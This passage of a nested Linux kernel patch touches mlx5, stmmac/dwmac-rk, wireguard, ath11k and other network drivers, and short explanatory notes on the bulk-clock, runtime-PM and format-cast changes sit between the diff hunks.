+-	mlx5_detach_device(dev);
++	mlx5_detach_device(dev, suspend);
+ 
+ 	if (!test_bit(MLX5_INTERFACE_STATE_UP, &dev->intf_state)) {
+ 		mlx5_core_warn(dev, "%s: interface is down, NOP\n",
+@@ -1515,12 +1515,12 @@ out:
+ 	mutex_unlock(&dev->intf_state_mutex);
+ }
+ 
+-void mlx5_unload_one(struct mlx5_core_dev *dev)
++void mlx5_unload_one(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
+ 	devl_lock(devlink);
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, suspend);
+ 	devl_unlock(devlink);
+ }
+ 
+@@ -1793,7 +1793,7 @@ static pci_ers_result_t mlx5_pci_err_detected(struct pci_dev *pdev,
+ 
+ 	mlx5_enter_error_state(dev, false);
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one(dev);
++	mlx5_unload_one(dev, true);
+ 	mlx5_drain_health_wq(dev);
+ 	mlx5_pci_disable_device(dev);
+ 
+@@ -1950,7 +1950,7 @@ static void shutdown(struct pci_dev *pdev)
+ 	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	err = mlx5_try_fast_unload(dev);
+ 	if (err)
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 	mlx5_pci_disable_device(dev);
+ }
+ 
+@@ -1958,7 +1958,7 @@ static int mlx5_suspend(struct pci_dev *pdev, pm_message_t state)
+ {
+ 	struct mlx5_core_dev *dev = pci_get_drvdata(pdev);
+ 
+-	mlx5_unload_one(dev);
++	mlx5_unload_one(dev, true);
+ 
+ 	return 0;
+ }
+@@ -2001,7 +2001,7 @@ MODULE_DEVICE_TABLE(pci, mlx5_core_pci_table);
+ void mlx5_disable_device(struct mlx5_core_dev *dev)
+ {
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, false);
+ }
+ 
+ int mlx5_recover_device(struct mlx5_core_dev *dev)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+index a806e3de7b7c3..1a35b3c2a3674 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+@@ -236,7 +236,7 @@ void mlx5_adev_cleanup(struct mlx5_core_dev *dev);
+ int mlx5_adev_init(struct mlx5_core_dev *dev);
+ 
+ int mlx5_attach_device(struct mlx5_core_dev *dev);
+-void mlx5_detach_device(struct mlx5_core_dev *dev);
++void mlx5_detach_device(struct mlx5_core_dev *dev, bool suspend);
+ int mlx5_register_device(struct mlx5_core_dev *dev);
+ void mlx5_unregister_device(struct mlx5_core_dev *dev);
+ struct mlx5_core_dev *mlx5_get_next_phys_dev_lag(struct mlx5_core_dev *dev);
+@@ -319,8 +319,8 @@ int mlx5_mdev_init(struct mlx5_core_dev *dev, int profile_idx);
+ void mlx5_mdev_uninit(struct mlx5_core_dev *dev);
+ int mlx5_init_one(struct mlx5_core_dev *dev);
+ void mlx5_uninit_one(struct mlx5_core_dev *dev);
+-void mlx5_unload_one(struct mlx5_core_dev *dev);
+-void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev);
++void mlx5_unload_one(struct mlx5_core_dev *dev, bool suspend);
++void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev, bool suspend);
+ int mlx5_load_one(struct mlx5_core_dev *dev, bool recovery);
+ int mlx5_load_one_devl_locked(struct mlx5_core_dev *dev, bool recovery);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+index 7b4783ce213e2..a7377619ba6f2 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+@@ -74,7 +74,7 @@ static void mlx5_sf_dev_shutdown(struct auxiliary_device *adev)
+ {
+ 	struct mlx5_sf_dev *sf_dev = container_of(adev, struct mlx5_sf_dev, adev);
+ 
+-	mlx5_unload_one(sf_dev->mdev);
++	mlx5_unload_one(sf_dev->mdev, false);
+ }
+ 
+ static const struct auxiliary_device_id mlx5_sf_dev_id_table[] = {
+diff --git a/drivers/net/ethernet/sfc/ef100_tx.c b/drivers/net/ethernet/sfc/ef100_tx.c
+index 102ddc7e206a7..29ffaf35559d6 100644
+--- a/drivers/net/ethernet/sfc/ef100_tx.c
++++ b/drivers/net/ethernet/sfc/ef100_tx.c
+@@ -367,7 +367,8 @@ void ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event)
+  * Returns 0 on success, error code otherwise. In case of an error this
+  * function will free the SKB.
+  */
+-int ef100_enqueue_skb(struct efx_tx_queue *tx_queue, struct sk_buff *skb)
++netdev_tx_t ef100_enqueue_skb(struct efx_tx_queue *tx_queue,
++			      struct sk_buff *skb)
+ {
+ 	return __ef100_enqueue_skb(tx_queue, skb, NULL);
+ }
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
+index 6656d76b6766b..cf682a9e3fff2 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
+@@ -39,6 +39,24 @@ struct rk_gmac_ops {
+ 	u32 regs[];
+ };
+ 
++static const char * const rk_clocks[] = {
++	"aclk_mac", "pclk_mac", "mac_clk_tx", "clk_mac_speed",
++};
++
++static const char * const rk_rmii_clocks[] = {
++	"mac_clk_rx", "clk_mac_ref", "clk_mac_refout",
++};
++
++enum rk_clocks_index {
++	RK_ACLK_MAC = 0,
++	RK_PCLK_MAC,
++	RK_MAC_CLK_TX,
++	RK_CLK_MAC_SPEED,
++	RK_MAC_CLK_RX,
++	RK_CLK_MAC_REF,
++	RK_CLK_MAC_REFOUT,
++};
++
+ struct rk_priv_data {
+ 	struct platform_device *pdev;
+ 	phy_interface_t phy_iface;
+@@ -51,15 +69,9 @@ struct rk_priv_data {
+ 	bool clock_input;
+ 	bool integrated_phy;
+ 
++	struct clk_bulk_data *clks;
++	int num_clks;
+ 	struct clk *clk_mac;
+-	struct clk *gmac_clkin;
+-	struct clk *mac_clk_rx;
+-	struct clk *mac_clk_tx;
+-	struct clk *clk_mac_ref;
+-	struct clk *clk_mac_refout;
+-	struct clk *clk_mac_speed;
+-	struct clk *aclk_mac;
+-	struct clk *pclk_mac;
+ 	struct clk *clk_phy;
+ 
+ 	struct reset_control *phy_reset;
+@@ -104,10 +116,11 @@ static void px30_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	int ret;
+ 
+-	if (IS_ERR(bsp_priv->clk_mac_speed)) {
++	if (!clk_mac_speed) {
+ 		dev_err(dev, "%s: Missing clk_mac_speed clock\n", __func__);
+ 		return;
+ 	}
+@@ -116,7 +129,7 @@ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		regmap_write(bsp_priv->grf, PX30_GRF_GMAC_CON1,
+ 			     PX30_GMAC_SPEED_10M);
+ 
+-		ret = clk_set_rate(bsp_priv->clk_mac_speed, 2500000);
++		ret = clk_set_rate(clk_mac_speed, 2500000);
+ 		if (ret)
+ 			dev_err(dev, "%s: set clk_mac_speed rate 2500000 failed: %d\n",
+ 				__func__, ret);
+@@ -124,7 +137,7 @@ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		regmap_write(bsp_priv->grf, PX30_GRF_GMAC_CON1,
+ 			     PX30_GMAC_SPEED_100M);
+ 
+-		ret = clk_set_rate(bsp_priv->clk_mac_speed, 25000000);
++		ret = clk_set_rate(clk_mac_speed, 25000000);
+ 		if (ret)
+ 			dev_err(dev, "%s: set clk_mac_speed rate 25000000 failed: %d\n",
+ 				__func__, ret);
+@@ -1066,6 +1079,7 @@ static void rk3568_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void rk3568_set_gmac_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1085,7 +1099,7 @@ static void rk3568_set_gmac_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1371,6 +1385,7 @@ static void rv1126_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1390,7 +1405,7 @@ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1398,6 +1413,7 @@ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 
+ static void rv1126_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1414,7 +1430,7 @@ static void rv1126_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1475,68 +1491,50 @@ static int rk_gmac_clk_init(struct plat_stmmacenet_data *plat)
+ {
+ 	struct rk_priv_data *bsp_priv = plat->bsp_priv;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+-	int ret;
++	int phy_iface = bsp_priv->phy_iface;
++	int i, j, ret;
+ 
+ 	bsp_priv->clk_enabled = false;
+ 
+-	bsp_priv->mac_clk_rx = devm_clk_get(dev, "mac_clk_rx");
+-	if (IS_ERR(bsp_priv->mac_clk_rx))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"mac_clk_rx");
++	bsp_priv->num_clks = ARRAY_SIZE(rk_clocks);
++	if (phy_iface == PHY_INTERFACE_MODE_RMII)
++		bsp_priv->num_clks += ARRAY_SIZE(rk_rmii_clocks);
+ 
+-	bsp_priv->mac_clk_tx = devm_clk_get(dev, "mac_clk_tx");
+-	if (IS_ERR(bsp_priv->mac_clk_tx))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"mac_clk_tx");
++	bsp_priv->clks = devm_kcalloc(dev, bsp_priv->num_clks,
++				      sizeof(*bsp_priv->clks), GFP_KERNEL);
++	if (!bsp_priv->clks)
++		return -ENOMEM;
+ 
+-	bsp_priv->aclk_mac = devm_clk_get(dev, "aclk_mac");
+-	if (IS_ERR(bsp_priv->aclk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"aclk_mac");
++	for (i = 0; i < ARRAY_SIZE(rk_clocks); i++)
++		bsp_priv->clks[i].id = rk_clocks[i];
+ 
+-	bsp_priv->pclk_mac = devm_clk_get(dev, "pclk_mac");
+-	if (IS_ERR(bsp_priv->pclk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"pclk_mac");
+-
+-	bsp_priv->clk_mac = devm_clk_get(dev, "stmmaceth");
+-	if (IS_ERR(bsp_priv->clk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"stmmaceth");
+-
+-	if (bsp_priv->phy_iface == PHY_INTERFACE_MODE_RMII) {
+-		bsp_priv->clk_mac_ref = devm_clk_get(dev, "clk_mac_ref");
+-		if (IS_ERR(bsp_priv->clk_mac_ref))
+-			dev_err(dev, "cannot get clock %s\n",
+-				"clk_mac_ref");
+-
+-		if (!bsp_priv->clock_input) {
+-			bsp_priv->clk_mac_refout =
+-				devm_clk_get(dev, "clk_mac_refout");
+-			if (IS_ERR(bsp_priv->clk_mac_refout))
+-				dev_err(dev, "cannot get clock %s\n",
+-					"clk_mac_refout");
+-		}
++	if (phy_iface == PHY_INTERFACE_MODE_RMII) {
++		for (j = 0; j < ARRAY_SIZE(rk_rmii_clocks); j++)
++			bsp_priv->clks[i++].id = rk_rmii_clocks[j];
+ 	}
+ 
+-	bsp_priv->clk_mac_speed = devm_clk_get(dev, "clk_mac_speed");
+-	if (IS_ERR(bsp_priv->clk_mac_speed))
+-		dev_err(dev, "cannot get clock %s\n", "clk_mac_speed");
++	ret = devm_clk_bulk_get_optional(dev, bsp_priv->num_clks,
++					 bsp_priv->clks);
++	if (ret)
++		return dev_err_probe(dev, ret, "Failed to get clocks\n");
++
++	/* "stmmaceth" will be enabled by the core */
++	bsp_priv->clk_mac = devm_clk_get(dev, "stmmaceth");
++	ret = PTR_ERR_OR_ZERO(bsp_priv->clk_mac);
++	if (ret)
++		return dev_err_probe(dev, ret, "Cannot get stmmaceth clock\n");
+ 
+ 	if (bsp_priv->clock_input) {
+ 		dev_info(dev, "clock input from PHY\n");
+-	} else {
+-		if (bsp_priv->phy_iface == PHY_INTERFACE_MODE_RMII)
+-			clk_set_rate(bsp_priv->clk_mac, 50000000);
++	} else if (phy_iface == PHY_INTERFACE_MODE_RMII) {
++		clk_set_rate(bsp_priv->clk_mac, 50000000);
+ 	}
+ 
+ 	if (plat->phy_node && bsp_priv->integrated_phy) {
+ 		bsp_priv->clk_phy = of_clk_get(plat->phy_node, 0);
+-		if (IS_ERR(bsp_priv->clk_phy)) {
+-			ret = PTR_ERR(bsp_priv->clk_phy);
+-			dev_err(dev, "Cannot get PHY clock: %d\n", ret);
+-			return -EINVAL;
+-		}
++		ret = PTR_ERR_OR_ZERO(bsp_priv->clk_phy);
++		if (ret)
++			return dev_err_probe(dev, ret, "Cannot get PHY clock\n");
+ 		clk_set_rate(bsp_priv->clk_phy, 50000000);
+ 	}
+ 
+@@ -1545,77 +1543,36 @@ static int rk_gmac_clk_init(struct plat_stmmacenet_data *plat)
+ 
+ static int gmac_clk_enable(struct rk_priv_data *bsp_priv, bool enable)
+ {
+-	int phy_iface = bsp_priv->phy_iface;
++	int ret;
+ 
+ 	if (enable) {
+ 		if (!bsp_priv->clk_enabled) {
+-			if (phy_iface == PHY_INTERFACE_MODE_RMII) {
+-				if (!IS_ERR(bsp_priv->mac_clk_rx))
+-					clk_prepare_enable(
+-						bsp_priv->mac_clk_rx);
+-
+-				if (!IS_ERR(bsp_priv->clk_mac_ref))
+-					clk_prepare_enable(
+-						bsp_priv->clk_mac_ref);
+-
+-				if (!IS_ERR(bsp_priv->clk_mac_refout))
+-					clk_prepare_enable(
+-						bsp_priv->clk_mac_refout);
+-			}
+-
+-			if (!IS_ERR(bsp_priv->clk_phy))
+-				clk_prepare_enable(bsp_priv->clk_phy);
++			ret = clk_bulk_prepare_enable(bsp_priv->num_clks,
++						      bsp_priv->clks);
++			if (ret)
++				return ret;
+ 
+-			if (!IS_ERR(bsp_priv->aclk_mac))
+-				clk_prepare_enable(bsp_priv->aclk_mac);
+-
+-			if (!IS_ERR(bsp_priv->pclk_mac))
+-				clk_prepare_enable(bsp_priv->pclk_mac);
+-
+-			if (!IS_ERR(bsp_priv->mac_clk_tx))
+-				clk_prepare_enable(bsp_priv->mac_clk_tx);
+-
+-			if (!IS_ERR(bsp_priv->clk_mac_speed))
+-				clk_prepare_enable(bsp_priv->clk_mac_speed);
++			ret = clk_prepare_enable(bsp_priv->clk_phy);
++			if (ret)
++				return ret;
+ 
+ 			if (bsp_priv->ops && bsp_priv->ops->set_clock_selection)
+ 				bsp_priv->ops->set_clock_selection(bsp_priv,
+ 					       bsp_priv->clock_input, true);
+ 
+-			/**
+-			 * if (!IS_ERR(bsp_priv->clk_mac))
+-			 *	clk_prepare_enable(bsp_priv->clk_mac);
+-			 */
+ 			mdelay(5);
+ 			bsp_priv->clk_enabled = true;
+ 		}
+ 	} else {
+ 		if (bsp_priv->clk_enabled) {
+-			if (phy_iface == PHY_INTERFACE_MODE_RMII) {
+-				clk_disable_unprepare(bsp_priv->mac_clk_rx);
+-
+-				clk_disable_unprepare(bsp_priv->clk_mac_ref);
+-
+-				clk_disable_unprepare(bsp_priv->clk_mac_refout);
+-			}
+-
++			clk_bulk_disable_unprepare(bsp_priv->num_clks,
++						   bsp_priv->clks);
+ 			clk_disable_unprepare(bsp_priv->clk_phy);
+ 
+-			clk_disable_unprepare(bsp_priv->aclk_mac);
+-
+-			clk_disable_unprepare(bsp_priv->pclk_mac);
+-
+-			clk_disable_unprepare(bsp_priv->mac_clk_tx);
+-
+-			clk_disable_unprepare(bsp_priv->clk_mac_speed);
+-
+ 			if (bsp_priv->ops && bsp_priv->ops->set_clock_selection)
+ 				bsp_priv->ops->set_clock_selection(bsp_priv,
+ 					      bsp_priv->clock_input, false);
+-			/**
+-			 * if (!IS_ERR(bsp_priv->clk_mac))
+-			 *	clk_disable_unprepare(bsp_priv->clk_mac);
+-			 */
++
+ 			bsp_priv->clk_enabled = false;
+ 		}
+ 	}
+@@ -1629,9 +1586,6 @@ static int phy_power_on(struct rk_priv_data *bsp_priv, bool enable)
+ 	int ret;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 
+-	if (!ldo)
+-		return 0;
+-
+ 	if (enable) {
+ 		ret = regulator_enable(ldo);
+ 		if (ret)
+@@ -1679,14 +1633,11 @@ static struct rk_priv_data *rk_gmac_setup(struct platform_device *pdev,
+ 		}
+ 	}
+ 
+-	bsp_priv->regulator = devm_regulator_get_optional(dev, "phy");
++	bsp_priv->regulator = devm_regulator_get(dev, "phy");
+ 	if (IS_ERR(bsp_priv->regulator)) {
+-		if (PTR_ERR(bsp_priv->regulator) == -EPROBE_DEFER) {
+-			dev_err(dev, "phy regulator is not available yet, deferred probing\n");
+-			return ERR_PTR(-EPROBE_DEFER);
+-		}
+-		dev_err(dev, "no regulator found\n");
+-		bsp_priv->regulator = NULL;
++		ret = PTR_ERR(bsp_priv->regulator);
++		dev_err_probe(dev, ret, "failed to get phy regulator\n");
++		return ERR_PTR(ret);
+ 	}
+ 
+ 	ret = of_property_read_string(dev->of_node, "clock_in_out", &strings);
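
The dwmac-rk hunk above folds a long run of per-clock devm_clk_get() calls into a
single clk_bulk request that is later enabled and disabled as a set. A minimal
sketch of that pattern, assuming a hypothetical consumer with two named clocks
("aclk" and "pclk" are stand-ins, not taken from the driver):

#include <linux/clk.h>
#include <linux/device.h>
#include <linux/errno.h>
#include <linux/kernel.h>
#include <linux/slab.h>

static const char * const demo_clk_names[] = { "aclk", "pclk" };

static int demo_clks_get_enable(struct device *dev,
				struct clk_bulk_data **out, int *num)
{
	struct clk_bulk_data *clks;
	int i, ret;

	*num = ARRAY_SIZE(demo_clk_names);
	clks = devm_kcalloc(dev, *num, sizeof(*clks), GFP_KERNEL);
	if (!clks)
		return -ENOMEM;

	for (i = 0; i < *num; i++)
		clks[i].id = demo_clk_names[i];

	/* _optional: clocks missing from the DT stay NULL and are silently
	 * skipped by the bulk enable/disable helpers. */
	ret = devm_clk_bulk_get_optional(dev, *num, clks);
	if (ret)
		return dev_err_probe(dev, ret, "Failed to get clocks\n");

	ret = clk_bulk_prepare_enable(*num, clks);	/* one call for the set */
	if (ret)
		return ret;

	*out = clks;
	return 0;
}

Individual clocks remain reachable by index (clks[i].clk), which is how the speed
callbacks above pick out RK_CLK_MAC_SPEED after the conversion.
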
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index fa3ce3b0d9a56..4903157230621 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -6346,6 +6346,10 @@ static int stmmac_vlan_rx_add_vid(struct net_device *ndev, __be16 proto, u16 vid
+ 	bool is_double = false;
+ 	int ret;
+ 
++	ret = pm_runtime_resume_and_get(priv->device);
++	if (ret < 0)
++		return ret;
++
+ 	if (be16_to_cpu(proto) == ETH_P_8021AD)
+ 		is_double = true;
+ 
+@@ -6353,16 +6357,18 @@ static int stmmac_vlan_rx_add_vid(struct net_device *ndev, __be16 proto, u16 vid
+ 	ret = stmmac_vlan_update(priv, is_double);
+ 	if (ret) {
+ 		clear_bit(vid, priv->active_vlans);
+-		return ret;
++		goto err_pm_put;
+ 	}
+ 
+ 	if (priv->hw->num_vlan) {
+ 		ret = stmmac_add_hw_vlan_rx_fltr(priv, ndev, priv->hw, proto, vid);
+ 		if (ret)
+-			return ret;
++			goto err_pm_put;
+ 	}
++err_pm_put:
++	pm_runtime_put(priv->device);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int stmmac_vlan_rx_kill_vid(struct net_device *ndev, __be16 proto, u16 vid)
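
The stmmac fix above takes a runtime-PM reference before touching the VLAN filter
and routes every exit through a single put, keeping the usage count balanced on the
error paths as well. The shape of that pattern, with demo_hw_op() as a hypothetical
stand-in for the register accesses:

#include <linux/device.h>
#include <linux/pm_runtime.h>

static int demo_hw_op(struct device *dev)
{
	return 0;	/* placeholder for the actual hardware work */
}

static int demo_ndo_op(struct device *dev)
{
	int ret;

	ret = pm_runtime_resume_and_get(dev);
	if (ret < 0)
		return ret;	/* on failure no reference is held */

	ret = demo_hw_op(dev);

	pm_runtime_put(dev);	/* one put covers success and failure */
	return ret;
}
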
+diff --git a/drivers/net/ethernet/sun/sunhme.c b/drivers/net/ethernet/sun/sunhme.c
+index b0c7ab74a82ed..7cf8210ebbec3 100644
+--- a/drivers/net/ethernet/sun/sunhme.c
++++ b/drivers/net/ethernet/sun/sunhme.c
+@@ -2834,7 +2834,7 @@ static int happy_meal_pci_probe(struct pci_dev *pdev,
+ 	int i, qfe_slot = -1;
+ 	char prom_name[64];
+ 	u8 addr[ETH_ALEN];
+-	int err;
++	int err = -ENODEV;
+ 
+ 	/* Now make sure pci_dev cookie is there. */
+ #ifdef CONFIG_SPARC
+diff --git a/drivers/net/pcs/pcs-xpcs.c b/drivers/net/pcs/pcs-xpcs.c
+index 70f88eae2a9e0..dd88624593c71 100644
+--- a/drivers/net/pcs/pcs-xpcs.c
++++ b/drivers/net/pcs/pcs-xpcs.c
+@@ -329,7 +329,7 @@ static int xpcs_read_fault_c73(struct dw_xpcs *xpcs,
+ 	return 0;
+ }
+ 
+-static int xpcs_read_link_c73(struct dw_xpcs *xpcs, bool an)
++static int xpcs_read_link_c73(struct dw_xpcs *xpcs)
+ {
+ 	bool link = true;
+ 	int ret;
+@@ -341,15 +341,6 @@ static int xpcs_read_link_c73(struct dw_xpcs *xpcs, bool an)
+ 	if (!(ret & MDIO_STAT1_LSTATUS))
+ 		link = false;
+ 
+-	if (an) {
+-		ret = xpcs_read(xpcs, MDIO_MMD_AN, MDIO_STAT1);
+-		if (ret < 0)
+-			return ret;
+-
+-		if (!(ret & MDIO_STAT1_LSTATUS))
+-			link = false;
+-	}
+-
+ 	return link;
+ }
+ 
+@@ -943,7 +934,7 @@ static int xpcs_get_state_c73(struct dw_xpcs *xpcs,
+ 	int ret;
+ 
+ 	/* Link needs to be read first ... */
+-	state->link = xpcs_read_link_c73(xpcs, state->an_enabled) > 0 ? 1 : 0;
++	state->link = xpcs_read_link_c73(xpcs) > 0 ? 1 : 0;
+ 
+ 	/* ... and then we check the faults. */
+ 	ret = xpcs_read_fault_c73(xpcs, state);
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 5663a184644d5..766f86bdc4a09 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -395,6 +395,10 @@ static const struct sfp_quirk sfp_quirks[] = {
+ 
+ 	SFP_QUIRK_F("HALNy", "HL-GSFP", sfp_fixup_halny_gsfp),
+ 
++	// HG MXPD-483II-F 2.5G supports 2500Base-X, but incorrectly reports
++	// 2600MBd in their EEPROM
++	SFP_QUIRK_M("HG GENUINE", "MXPD-483II", sfp_quirk_2500basex),
++
+ 	// Huawei MA5671A can operate at 2500base-X, but report 1.2GBd NRZ in
+ 	// their EEPROM
+ 	SFP_QUIRK("HUAWEI", "MA5671A", sfp_quirk_2500basex,
+diff --git a/drivers/net/wireguard/timers.c b/drivers/net/wireguard/timers.c
+index d54d32ac9bc41..91f5d6d2d4e2d 100644
+--- a/drivers/net/wireguard/timers.c
++++ b/drivers/net/wireguard/timers.c
+@@ -46,7 +46,7 @@ static void wg_expired_retransmit_handshake(struct timer_list *timer)
+ 	if (peer->timer_handshake_attempts > MAX_TIMER_HANDSHAKES) {
+ 		pr_debug("%s: Handshake for peer %llu (%pISpfsc) did not complete after %d attempts, giving up\n",
+ 			 peer->device->dev->name, peer->internal_id,
+-			 &peer->endpoint.addr, MAX_TIMER_HANDSHAKES + 2);
++			 &peer->endpoint.addr, (int)MAX_TIMER_HANDSHAKES + 2);
+ 
+ 		del_timer(&peer->timer_send_keepalive);
+ 		/* We drop all packets without a keypair and don't try again,
+@@ -64,7 +64,7 @@ static void wg_expired_retransmit_handshake(struct timer_list *timer)
+ 		++peer->timer_handshake_attempts;
+ 		pr_debug("%s: Handshake for peer %llu (%pISpfsc) did not complete after %d seconds, retrying (try %d)\n",
+ 			 peer->device->dev->name, peer->internal_id,
+-			 &peer->endpoint.addr, REKEY_TIMEOUT,
++			 &peer->endpoint.addr, (int)REKEY_TIMEOUT,
+ 			 peer->timer_handshake_attempts + 1);
+ 
+ 		/* We clear the endpoint address src address, in case this is
+@@ -94,7 +94,7 @@ static void wg_expired_new_handshake(struct timer_list *timer)
+ 
+ 	pr_debug("%s: Retrying handshake with peer %llu (%pISpfsc) because we stopped hearing back after %d seconds\n",
+ 		 peer->device->dev->name, peer->internal_id,
+-		 &peer->endpoint.addr, KEEPALIVE_TIMEOUT + REKEY_TIMEOUT);
++		 &peer->endpoint.addr, (int)(KEEPALIVE_TIMEOUT + REKEY_TIMEOUT));
+ 	/* We clear the endpoint address src address, in case this is the cause
+ 	 * of trouble.
+ 	 */
+@@ -126,7 +126,7 @@ static void wg_queued_expired_zero_key_material(struct work_struct *work)
+ 
+ 	pr_debug("%s: Zeroing out all keys for peer %llu (%pISpfsc), since we haven't received a new one in %d seconds\n",
+ 		 peer->device->dev->name, peer->internal_id,
+-		 &peer->endpoint.addr, REJECT_AFTER_TIME * 3);
++		 &peer->endpoint.addr, (int)REJECT_AFTER_TIME * 3);
+ 	wg_noise_handshake_clear(&peer->handshake);
+ 	wg_noise_keypairs_clear(&peer->keypairs);
+ 	wg_peer_put(peer);
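
The (int) casts in the wireguard hunk are not cosmetic: these timeout constants live
in an enum that also holds 64-bit members, and on compilers where one oversized
member widens all the enumerators, handing them to a "%d" specifier is a format
mismatch. A small stand-alone illustration (the names are stand-ins, and the
oversized enumerator relies on a GNU extension, standardized in C23):

#include <stdio.h>

enum demo_limits {
	DEMO_REKEY_TIMEOUT = 5,
	DEMO_REJECT_AFTER_MESSAGES = 0xffffffffffffffffULL,
};

int main(void)
{
	/* The cast pins the argument to int, so "%d" matches no matter
	 * how wide the compiler made the enumerators. */
	printf("retrying in %d seconds\n", (int)DEMO_REKEY_TIMEOUT);
	return 0;
}
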
+diff --git a/drivers/net/wireless/ath/ath11k/ahb.c b/drivers/net/wireless/ath/ath11k/ahb.c
+index d34a4d6325b2b..76f275ca53e9c 100644
+--- a/drivers/net/wireless/ath/ath11k/ahb.c
++++ b/drivers/net/wireless/ath/ath11k/ahb.c
+@@ -859,11 +859,11 @@ static int ath11k_ahb_setup_msi_resources(struct ath11k_base *ab)
+ 	ab->pci.msi.ep_base_data = int_prop + 32;
+ 
+ 	for (i = 0; i < ab->pci.msi.config->total_vectors; i++) {
+-		res = platform_get_resource(pdev, IORESOURCE_IRQ, i);
+-		if (!res)
+-			return -ENODEV;
++		ret = platform_get_irq(pdev, i);
++		if (ret < 0)
++			return ret;
+ 
+-		ab->pci.msi.irqs[i] = res->start;
++		ab->pci.msi.irqs[i] = ret;
+ 	}
+ 
+ 	set_bit(ATH11K_FLAG_MULTI_MSI_VECTORS, &ab->dev_flags);
+@@ -1063,6 +1063,12 @@ static int ath11k_ahb_fw_resource_deinit(struct ath11k_base *ab)
+ 	struct iommu_domain *iommu;
+ 	size_t unmapped_size;
+ 
++	/* Chipsets not requiring MSA will not have initialized
++	 * MSA resources; return success in such cases.
++	 */
++	if (!ab->hw_params.fixed_fw_mem)
++		return 0;
++
+ 	if (ab_ahb->fw.use_tz)
+ 		return 0;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/dbring.c b/drivers/net/wireless/ath/ath11k/dbring.c
+index 2107ec05d14fd..5536e86423312 100644
+--- a/drivers/net/wireless/ath/ath11k/dbring.c
